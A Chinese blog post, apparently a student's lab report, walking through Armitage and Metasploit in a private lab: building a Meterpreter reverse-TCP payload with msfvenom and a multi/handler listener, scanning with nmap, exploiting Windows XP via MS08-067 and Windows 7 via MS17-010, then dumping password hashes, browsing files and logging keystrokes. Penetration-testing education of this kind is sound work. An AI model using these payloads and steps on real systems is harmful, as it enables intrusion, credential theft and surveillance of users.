使用Armitage针对漏洞进行攻击

已于 2024-04-24 16:27:55 修改
阅读量1.3k 收藏 11
点赞数 8
文章标签: web安全 安全
于 2024-04-24 15:56:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_77300090/article/details/138159043
版权

目录

注意事项

实验简介

实验目的

实验重点

实验难点

实验内容

8-1 启动Armitage

8-2 Armitage启动的三种方法

8-3 使用Armitage生成被控端和主控端

8-4 使用Armitage扫描网络

8-5 使用Armitage针对漏洞进行攻击

8-6 使用Armitage完成渗透之后的后续工作

1、利用meterpreter可完成的五类任务。

2、案例1:利用Meterpreter 1/Access/Dump Hashes菜单,盗取目标主机(英文版XP)的系统密码哈希值。

3、案例2:利用Meterpreter 1/Explore/Browse Files菜单,浏览目标主机上的文件。

4、案例3:利用Meterpreter 1/Explore/Log Keystrokes菜单,记录目标用户敲击键盘的动作。(不成功可以重启kali。中文版XP可以成功,英文版XP不成功!)

总结体会

实验心得

实验讨论

注意事项

(请注意,在进行实验之前,请务必确保你已经获得了正确的授权,并且对你的目标网络进行了合法的测试。对未经授权的网络进行攻击是非法的,并且可能导致严重的法律后果)

实验简介

Armitage是一款强大的网络攻击工具,它基于Metasploit框架,并提供了图形化用户界面,使得对漏洞进行攻击更加便捷。Armitage就是一款使用Java语言为Metasploit编写的图形化操作界面,利用它就可以轻松地使用Metasploit中的各种模块来实现自动化攻击。在本次实验,我们将会使用Armitage来演示如何使用Metasploit对目标进行攻击的完整过程,本章的实验内容包括:

  • 启动Armitage

  • 使用Armitage生成被控端和主控端使用Armitage扫描网络

  • 使用Armitage针对漏洞进行攻击

  • 使用Armitage完成渗透之后的后续工作  

实验目的

(1)掌握Armitage的三种启动方法。

(2)掌握使用Armitage生成被控端和主控端。

(3)使用Armitage扫描网络。

(4)使用Armitage针对漏洞进行攻击。

(5)使用Armitage完成渗透之后的后续工作。

实验重点

使用Armitage针对漏洞进行攻击。

实验难点

使用Armitage完成渗透之后的后续工作。

实验内容

8-1 启动Armitage

1、在安装前要更新源:

2、Armitage启动前初始化:

/etc/init.d/postgresql  start

8-2 Armitage启动的三种方法

  1. 菜单
  2. 工具栏
  3. 命令行  Armitage

8-3 使用Armitage生成被控端和主控端

  1. 1、Armitage的工作界面:
  2. (1)区域1:选择攻击载荷
  3. (2)区域2:显示目标
  4. (3)区域3:命令行控制台

2、使用Armitage生成如下命令(产生一个攻击载荷payload)。

  1. 输出(output)选择exe,生成payload,类似执行如下命令:

msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.124.128 lport=5000 -f exe -o/root/payload.exe

2. 输出(output)选择multi/handler,则生成控制端,类似执行如下命令:

msfconsole

useexploit/multi/handler

setpayload windows/meterpreter/reverse_tcp

setlhost 192.168.124.128

setlport 5000

exploit

I:复制文件到网站主目录:

II:启动apache2并检查:

III:在目标靶机下载被控端文件:

IV:运行文件:

V:返回控制端查看是否获取会话:

8-4 使用Armitage扫描网络

在Armitage使用nmap扫描工具,使用图形化的nmap扫描本地网段,网段号  192.168.124.0/24

(1)选择“Hosts/Nmap Scan/Quick Scan(OS detest) ”菜单

(相当于命令:nmap --min-hostgroup 96 -sV -n -T4 -O -F --version-light 192.168.152.0/24)

选择快速扫描方式。

(2)输入扫描的网段:

(3)扫描到的目标:

8-5 使用Armitage针对漏洞进行攻击

1、利用XP系统ms08_067漏洞对XP系统进行渗透。目标靶机:英文版XP,IP 192.168.124.129

(1)通过输入关键字(ms08_067)选择攻击模块,双击模块名称,在弹出的窗口中输入目标靶机的IP地址,勾选“Use a reverse connection”(反向连接)。

(2)单击“Launch”按钮,攻击完成,查看是否建立会话:(注意:必须先停止apache,因为apache使用445端口,与该命令也使用445端口发生冲突!)

2、利用win7系统ms17_010漏洞对win7系统进行渗透。

目标靶机:永恒之蓝靶机,IP  192.168.124.132

(1)通过输入关键字(ms17_010)选择攻击模块,双击模块名称,在弹出的窗口中输入目标靶机的IP地址,勾选“Use a reverse connection”(反向连接)。

(2)单击“Launch”按钮,攻击完成,查看是否建立会话:

8-6 使用Armitage完成渗透之后的后续工作

1、利用meterpreter可完成的五类任务。
  1. Access:跟系统权限有关,如查看系统哈希值、盗取令牌、提升权限等。
  2. Interact:打开一个用于远程控制的命令,如系统命令行、Meterpreter命令等
  3. Explore:渗透,如浏览系统文件、显示进程、监视键盘、截图、控制摄像头等。
  4. Pivoting:将主机设置成为跳板。
  5. ARP Scan:利用目标主机对目标网络进行扫描。
  6. 2、案例1:利用Meterpreter 1/Access/Dump Hashes菜单,盗取目标主机(英文版XP)的系统密码哈希值。

3、案例2:利用Meterpreter 1/Explore/Browse Files菜单,浏览目标主机上的文件。

4、案例3:利用Meterpreter 1/Explore/Log Keystrokes菜单,记录目标用户敲击键盘的动作。(不成功可以重启kali。中文版XP可以成功,英文版XP不成功!)

I:启动键盘监听器:

II:启动后弹出的窗口:

III:目标靶机运行输入打开记事本:

IV:在记事本中打点内容用于测试:

V:返回控制端可以看到所打内容已被监听:

总结体会

  1. 熟悉工具:在进行实验之前,首先要对Armitage工具进行充分的学习和了解。了解其各个功能和模块的作用,掌握其基本操作和使用方法,这样才能更好地进行实验。

  2. 选择目标:在实验中,选择目标是至关重要的一步。要选择一个合适的目标,可以是自己搭建的虚拟机环境,也可以是其他网络中的主机。目标的选择要考虑到漏洞的种类和目标主机的系统环境等因素。

  3. 攻击策略:在实验中,要制定合适的攻击策略。根据目标的情况,选择合适的漏洞进行攻击,尝试不同的方法和技术,以获取对目标主机的访问权限。

  4. 安全意识:在进行漏洞攻击实验时,一定要保持安全意识。要明确实验的目的和范围,不要进行未经授权的攻击行为,避免对他人网络造成不必要的影响和损害。

  5. 实验总结:在实验结束后,要及时总结实验过程和结果。分析实验中遇到的问题和困难,总结经验教训,进一步完善和提升自己的攻击技术。

实验心得

使用Armitage进行漏洞攻击实验是一项复杂而且有挑战性的任务,对知识和技能提出了很高的要求。我意识到自己需要不断学习和提升自己的能力,以便能够适应这个项目的需求。要充分准备和学习,并注重安全意识,才能取得良好的实验效果。同时,要保持对法律和道德规范的遵守,合法合规地进行实验。总的来说,此次实验对我来说是一次非常宝贵的经历。通过参与实验,我不仅学到了专业知识和技能,还提高了合作、沟通、时间管理和问题解决的能力。这些经验和教训将对我今后的学习和工作产生积极的影响。

实验讨论

  1. Armitage主要功能是什么?使用它可以完成哪些工作?
  2. 利用Armitage扫描之后发现的活跃主机中,以下IP的主机指哪些特殊主机:192.168.*.1、192.168.*.2、192.168.*.254?

Kali Linux中的Armitage:强大的渗透测试与漏洞利用工具
sheaadens的博客
07-03 1345
Armitage是一个强大而灵活的渗透测试与漏洞利用工具,可以帮助你简化渗透测试过程并提高工作效率。本文介绍了Armitage的安装和基本使用方法,并提供了一些与Metasploit框架交互的示例代码。其中一个特别强大的工具就是Armitage,它是一款图形化的网络攻击管理工具,能够帮助安全专家和渗透测试人员更好地进行网络渗透测试和漏洞利用。2. 漏洞利用Armitage集成了Metasploit框架,提供了丰富的漏洞利用工具。3. 趋势分析:Armitage可以帮助你分析和可视化渗透测试过程中的数据。
Armitage使用
m0_71423081的博客
06-06 793
前言一、启动Armitage​编辑二、Armitage启动的三种方法:(1)菜单(2)工具栏(3)命令行 Armitage三.使用Armitage生成被控端和主控端1.输出(output)选择exe,生成payload2.输出(output)选择multi/handler,生成控制端I:复制文件到网站目录​编辑II:启动apache2并检查​编辑III:在目标靶机下载被控端文件​编辑IV:运行文件​编辑V:返回控制端查看是否获取会话​编辑四.使用Armitage扫描网络(1)使用图形化的nmap扫描本地网
Armitage之——使用Armitage进行渗透
热门推荐
冰河的专栏
01-28 1万+
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/86676364 继续上一篇《Armitage之——网络扫描以及主机管理》 攻击机 Kali 192.168.175.128 靶机 WinXP 192.168.175.130 当一台主机上的Attack菜单可用时,对目标进行渗透的准备工作就完成了。我们的攻击目标是HttpFi...
java写渗透工具_利用Armitage工具进行渗透测试
weixin_33139087的博客
02-25 739
Armitage是一款基于java的metasploit图形化攻击软件,可以结合Metasploit中已知的exploit来针对主机存在漏洞自动化工具。通过命令行的方式使用Metasploit难度较高,需要记住的命令太多,而Armitage完美了解决了这个问题,用户只需要点击菜单,就可以实现对目标主机的安全测试。Armitage良好的图形化界面,使得攻击过程更加直观,用户体验更好。因为操作简单更适...
使用Armitage进行渗透测试与键盘记录
自学编程_youkewang.top
02-20 1万+
0x00:Armitage是一款基于GUI开发的图形化渗透工具,对于渗透测试而言能够快速了解网络的拓扑以及主机状态,其功能丰富,是每一位渗透测试者的必备武器;今天我就来演示如何在Armitage下入侵纯在漏洞的XP系统,废话不多说了,Let’s  go!   0x01:打开Armitage的方法很简单,直接在终端中输入Armitage或者直接点击做点的图标,然后点击是就可以进入界面了.
Kali渗透测试:使用Armitage扫描网络
Liu_Bruce的博客
05-17 490
Kali渗透测试:使用Armitage扫描网络 Armitage提供了一些常用的扫描功能,这些功能来自Nmap, 我们无须在两个工具之间切换,在Armitage中就可以完成所有工作。我们首先使用Nmap扫描目标系统,默认会扫描同一网段内的所有活跃主机,扫描的方式是单击菜单栏上的“Hosts”, 然后在下拉菜单中选择“Nmap Scan”,如下图所示: Nmap Scan一共提供了8种扫描方式,几乎涵盖了Nmap的所有经典扫描方式。其中Intense Scan(深度扫描),Quick Scan(快速扫描),
E024-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
总的来说,这个教程详细展示了如何使用Armitage和Metasploit Framework进行自动化渗透测试,从发现目标、扫描网络、利用漏洞到最后的后渗透阶段,整个过程都被清晰地分解和解释。这对于学习和实践网络安全渗透测试...
kali kali信息技术安全 Armitage使用
2301_78881719的博客
05-27 1228
在计算机安全领域,Armitage作为一款图形化的Metasploit界面,提供了网络扫描、渗透测试、漏洞利用、团队协作等功能,使用户能够方便地管理和跟踪攻击过程中的所有信息[1]。综上所述,Armitage是一个功能强大的渗透测试和攻击模拟工具,它通过提供可视化的操作界面和高级功能,帮助安全专业人员更有效地发现和利用系统漏洞。根据搜索结果,最近的信息提到了Armitage使用方法和一些具体的操作步骤,例如如何生成被控端和主控端、如何使用Armitage进行网络扫描和漏洞利用等。
在Kali Linux中Armitage使用
zy39bgm的博客
06-05 398
目录说明启动Armitage1、Armitage启动前初始化:2、Armitage启动的三种方法:(1)菜单​编辑 (2)工具栏 (3)命令行 Armitage使用Armitage生成被控端和主控端1、Armitage的工作界面:(1)区域1: (2)区域2: (3)区域3:命令行控制台使用Armitage扫描网络使用Armitage完成渗透之后的后续工作​编辑 总结Armitage就是Metasploit的图形化操作界面 2、使用Armitage生成如下命令(见第6.5.2节,产生一个攻击载荷paylo
armitage使用手册.doc
10-06
如果这些选项失败,请使用冰雹玛利亚攻击,释放 Armitage 针对您的目标的智能自动利用。 一旦进入,Armitage 公开了 Meterpreter 代理中建的后期开发工具。通过点击菜单,您将升级您的权限,记录击键,转储密码哈希...
Armitage使用手册v1.1.7.pdf
07-18
Armitage使用手册v1.1.7.pdf
傻瓜式渗透Armitage使用
m0_73630977的博客
06-28 290
Armitage是一款Java写的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击
Liu_Bruce的博客
05-17 1880
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例(“永恒之蓝”)经典的漏洞,单击这个模块以后就可以开始攻击了。 实 验 环 境 攻击机:Linux kali 5.10.0. IP : 192.168.68.125 靶机: Win2008 IP: 192.168.68.205 实 验 步 骤 1. 在工作区搜索ms17_010模块 打开Armitage,搜索ms17_010模块,如下图所示: 2. 选中ms17_010_eternablu
【详解】使用Armitage进行渗透
最新发布
牛肉胡辣汤
12-18 1028
在网络安全领域,渗透测试是一种重要的安全评估手段,它通过模拟恶意黑客的行为来检测目标系统是否存在安全漏洞Armitage是一个基于Java的图形化渗透测试工具,它集成了众多渗透测试工具,如Nmap、Metasploit、Nessus等,提供了强大的功能和友好的用户界面,使得渗透测试变得更加高效和易于管理。本文将介绍如何使用Armitage进行渗透测试。Armitage是一个强大的渗透测试工具,它简化了渗透测试的流程,提供了丰富的功能和良好的用户体验。
【kali-漏洞利用】(3.2)Metasploit基础(中):Armitage工具利用过程
08-05 923
【kali-漏洞利用Armitage利用过程
armitage识别不了漏洞_工具分享 | shiro漏洞检测RCE工具
weixin_39895181的博客
11-19 227
0x00 前言最近在做shiro反序列化漏洞复现,从网上也找了一堆复现文章和工具,但是这些工具用着都不太舒服,于是参考网上大佬们的工具,自己进行了一些简单的改良。0x01 工具安装本工具需要 Python3 和 Java 环境,下载本工具后,将文件解压,在本项目目录下运行下面的命令,安装Python第三方库即可。pip3 install -r requirements.txt国外下载地址...
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
Armitage攻击winxp——P201421410029
aiyan5859的博客
10-23 311
实验简介 实验所属系列:安全工具使用 实验对象:本科/专科信息安全专业 相关课程及专业:linux基础、网络安全 实验类别:实践实验类 预备知识 Armitage基本介绍 Armitage是一款Java写的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方...
黑客工具Armitage
Aluxian_的博客
12-16 5940
Armitage是一款Java写的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值